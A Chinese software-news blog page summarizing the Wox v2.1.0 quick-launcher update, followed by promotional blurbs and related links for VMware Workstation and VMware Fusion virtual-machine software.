现在用户可以在任意应用中选中文本，按下热键后，让 AI 自动优化、翻译或处理文本，并在结果生成后直接替换原内容。

WebView

嵌入式网页预览，也能在网站保存了错误会话或缓存时快速恢复：

Usage

使用 Wox 的统计数据：

Color Plugin

新增 Color 插件。

获取

• GitHub
• 网盘搬运

原文：https://www.appinn.com/wox-v2-1-0/

还有一些更新，如果你在使用 Wox，推荐更新。如果你缺一个快速启动工具，可以试试。

相关阅读

• 活久见，跨平台快速启动工具 Wox v2.0.0 更新｜“Alfred 和 Launchy 替代品”
• EasyGO – 快捷启动软件[Windows]
• Wox – 开源快速启动工具
• 总结 Windows 下 38 款常见的「快速启动类软件」，欢迎补充
• 一键保存全文到 Obsidian 以及本地快照、自动标注，适合新用户的简悦 Obsidian 配置库

[ 点击前往获取链接 ]

虚拟机软件可让你在不重启电脑的情况下，在一个操作系统上同时运行多个不同的系统，譬如在 Win10 上同时运行 Ubuntu 与 Win7，用户可用于各种开发、测试或运行不同平台的软件。

VMware Workstation Pro 26H1 中文专业版功能相对免费的 VMWare Player 要丰富强大得多！新版本支持 Windows 11，支持 USB 3.1、TPM 2.0、蓝牙、4K，支持容器、兼容 Hyper-V，支持 DirectX 11 和 OpenGL 4.3 加速，3D 游戏性能大幅提高！另还可共享或远程控制虚拟机等……

「 前往查看原文.... 」

• VirtualBox 7.2 最新虚拟机软件下载 - 免费开源跨平台 (支持 Win/Mac/Linux 安装多系统)
• VMWare Fusion Pro 26H1 - 最新苹果 Mac 免费虚拟机 (支持 M 芯片 / Win11 ARM)
• VMWare Player 17.5.1 中文版 - 官方免费版虚拟机软件 (支持3D游戏与Win11系统)
• PVE 9.2 (Proxmox VE) 虚拟机系统 - 开源免费！同时安装运行多个不同操作系统

异次元首页  |  微信公众号  |  关注微博  |  软件精选  |  软件激活码折扣

使用苹果 Mac 电脑不可避免都会遇到一些软件、硬件只能在 Windows 下使用 (如网银/行业软件/仅能兼容 IE 的网站、无 Mac 驱动的硬件等)，因此在 Mac 上安装 Win 是很有必要的。

曾经我们可用 BootCamp 安装双系统，但如今只能使用虚拟机安装。VMWare Fusion Pro 26H1 是 Mac 下优秀高性能的虚拟机软件 (同类有 Parallels Desktop)，完美兼容最新的 macOS 和苹果 M 系列芯片，能无需重启，直接在 Mac 下同时运行 Windows 11、Linux 等多款系统……

「 前往查看原文.... 」

• Parallels Desktop 26 激活码 - 苹果 Mac 最新 PD 虚拟机下载 (支持Win11/macOS Tahoe)
• VirtualBox 7.2 最新虚拟机软件下载 - 免费开源跨平台 (支持 Win/Mac/Linux 安装多系统)
• VMware Workstation Pro 26H1 - 最新免费虚拟机软件专业版 (中文汉化版 / 免激活)
• VMWare Player 17.5.1 中文版 - 官方免费版虚拟机软件 (支持3D游戏与Win11系统)

异次元首页  |  微信公众号  |  关注微博  |  软件精选  |  软件激活码折扣